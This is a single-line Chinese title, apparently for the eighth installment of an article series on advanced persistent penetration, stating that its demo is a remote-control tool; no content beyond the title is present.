高级持续渗透-第八季demo便是远控